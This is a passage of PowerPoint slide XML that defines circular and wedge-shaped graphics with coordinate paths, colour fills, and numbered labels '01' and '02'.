                    <a:pt x="1361901" y="470279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1345519" y="427714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1326497" y="386536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1304939" y="346851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280949" y="308762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1254632" y="272375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1226093" y="237793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195435" y="205120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162762" y="174462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128180" y="145923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1091793" y="119606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1053704" y="95616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1014019" y="74058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972841" y="55036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930276" y="38654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886426" y="25017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="841397" y="14228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795293" y="6393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748218" y="1615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700277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4433061" y="4615688"/>
            <a:ext cx="3429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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>01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280452" y="3948271"/>
            <a:ext cx="1704339" cy="1721485"/>
            <a:chOff x="7280452" y="3948271"/>
            <a:chExt cx="1704339" cy="1721485"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7280452" y="3948271"/>
              <a:ext cx="1704339" cy="1721485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1704340" h="1721485">
                  <a:moveTo>
                    <a:pt x="838475" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="791541" y="2457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745124" y="7450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699308" y="14923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654179" y="24817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609824" y="37077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566327" y="51645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523773" y="68464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482250" y="87478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441841" y="108629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402632" y="131861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364710" y="157116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328159" y="184338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293065" y="213470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259514" y="244454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227591" y="277235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197381" y="311754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168970" y="347956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142444" y="385783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117888" y="425178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95388" y="466084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75029" y="508444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56896" y="552202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41076" y="597301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27653" y="643683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16713" y="691292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8445" y="739436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941" y="787406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="835116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="882481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2448" y="929415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7432" y="975833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14897" y="1021649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24784" y="1066778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37037" y="1111133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51599" y="1154630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68413" y="1197184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87422" y="1238707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108569" y="1279116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131797" y="1318324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157049" y="1356247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184268" y="1392798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213398" y="1427892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244380" y="1461443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277159" y="1493366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311677" y="1523576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347877" y="1551986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385703" y="1578513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425097" y="1603069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466003" y="1625569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508363" y="1645928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552121" y="1664061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597220" y="1679881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643602" y="1693304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691210" y="1704244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739355" y="1712512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787325" y="1718016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835035" y="1720812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882400" y="1720957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929334" y="1718509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975752" y="1713523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021568" y="1706058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066696" y="1696170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111052" y="1683916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154549" y="1669352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197102" y="1652537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238626" y="1633526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279035" y="1612376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318243" y="1589145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356165" y="1563890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392716" y="1536667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427810" y="1507534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1461361" y="1476546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493285" y="1443762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523494" y="1409238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1551905" y="1373031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578431" y="1335198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1602987" y="1295796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625488" y="1254882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1645847" y="1212512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1663979" y="1168744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679800" y="1123635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693223" y="1077241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704162" y="1029620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860374" y="860456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029665" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981521" y="8412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933551" y="2920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885840" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838475" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="EE6360">
                <a:alpha val="37646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440168" y="4108703"/>
              <a:ext cx="1400810" cy="1400810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1400809" h="1400810">
                  <a:moveTo>
                    <a:pt x="700277" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="652337" y="1615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605262" y="6393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559158" y="14228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514129" y="25017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470279" y="38654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427714" y="55036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386536" y="74058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346851" y="95616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308762" y="119606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272375" y="145923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237793" y="174462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205120" y="205120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174462" y="237793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145923" y="272375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119606" y="308762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95616" y="346851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74058" y="386536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55036" y="427714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38654" y="470279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25017" y="514129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14228" y="559158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6393" y="605262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615" y="652337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="700278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615" y="748218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6393" y="795293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14228" y="841397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25017" y="886426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38654" y="930276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55036" y="972841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74058" y="1014019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95616" y="1053704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119606" y="1091793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145923" y="1128180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174462" y="1162762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205120" y="1195435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237793" y="1226093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272375" y="1254632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308762" y="1280949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346851" y="1304939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386536" y="1326497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427714" y="1345519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470279" y="1361901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514129" y="1375538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559158" y="1386327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605262" y="1394162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652337" y="1398940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700277" y="1400556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748218" y="1398940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795293" y="1394162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="841397" y="1386327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886426" y="1375538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930276" y="1361901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972841" y="1345519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1014019" y="1326497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1053704" y="1304939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1091793" y="1280949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128180" y="1254632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162762" y="1226093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195435" y="1195435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1226093" y="1162762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1254632" y="1128180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280949" y="1091793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1304939" y="1053704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1326497" y="1014019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1345519" y="972841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361901" y="930276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375538" y="886426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386327" y="841397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394162" y="795293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398940" y="748218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400555" y="700278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398940" y="652337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394162" y="605262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386327" y="559158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375538" y="514129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361901" y="470279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1345519" y="427714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1326497" y="386536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1304939" y="346851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280949" y="308762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1254632" y="272375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1226093" y="237793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195435" y="205120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162762" y="174462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128180" y="145923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1091793" y="119606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1053704" y="95616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1014019" y="74058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="972841" y="55036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930276" y="38654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886426" y="25017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="841397" y="14228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795293" y="6393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748218" y="1615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700277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7969377" y="4615688"/>
            <a:ext cx="3429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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>02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816432" y="3948271"/>
            <a:ext cx="1704339" cy="1721485"/>
            <a:chOff x="10816432" y="3948271"/>
            <a:chExt cx="1704339" cy="1721485"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10816432" y="3948271"/>
              <a:ext cx="1704339" cy="1721485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1704340" h="1721485">
                  <a:moveTo>
                    <a:pt x="838430" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="791496" y="2457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745078" y="7450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699262" y="14923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654134" y="24817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609778" y="37077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566281" y="51645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523728" y="68464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482204" y="87478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441795" y="108629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402587" y="131861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364664" y="157116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328114" y="184338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293020" y="213470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259468" y="244454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227545" y="277235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197335" y="311754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168925" y="347956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142399" y="385783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117843" y="425178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95342" y="466084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74983" y="508444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56850" y="552202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41030" y="597301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27607" y="643683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16668" y="691292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8412" y="739436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2920" y="787406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="835116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="882481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2457" y="929415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7450" y="975833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14923" y="1021649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24817" y="1066778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37077" y="1111133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51645" y="1154630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68464" y="1197184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87478" y="1238707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108629" y="1279116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131861" y="1318324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157116" y="1356247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184338" y="1392798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213470" y="1427892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244454" y="1461443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277235" y="1493366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311754" y="1523576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347956" y="1551986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385783" y="1578513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425178" y="1603069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466084" y="1625569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508444" y="1645928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552202" y="1664061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597301" y="1679881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643683" y="1693304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691292" y="1704244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739436" y="1712512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787406" y="1718016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835116" y="1720812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882481" y="1720957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929415" y="1718509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975833" y="1713523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021649" y="1706058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066778" y="1696170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111133" y="1683916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154630" y="1669352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197184" y="1652537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238707" y="1633526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279116" y="1612376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318324" y="1589145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356247" y="1563890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392798" y="1536667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427892" y="1507534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1461443" y="1476546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493366" y="1443762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523576" y="1409238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1551986" y="1373031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578513" y="1335198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603069" y="1295796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625569" y="1254882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1645928" y="1212512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1664061" y="1168744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679881" y="1123635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693304" y="1077241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704244" y="1029620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860456" y="860456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029620" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981475" y="8412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933505" y="2920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885795" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838430" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0075C4">
                <a:alpha val="3568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977372" y="4108703"/>
              <a:ext cx="1399540" cy="1400810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1399540" h="1400810">
                  <a:moveTo>
                    <a:pt x="699516" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="651622" y="1615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604595" y="6393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558538" y="14228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513556" y="25017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469752" y="38654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427231" y="55036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386098" y="74058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346455" y="95616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308409" y="119606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272061" y="145923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237518" y="174462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204882" y="205120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174259" y="237793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145752" y="272375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119465" y="308762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95503" y="346851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73971" y="386536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54971" y="427714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38608" y="470279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24987" y="514129"/>
                  </a:lnTo>
                  <a:lnTo>
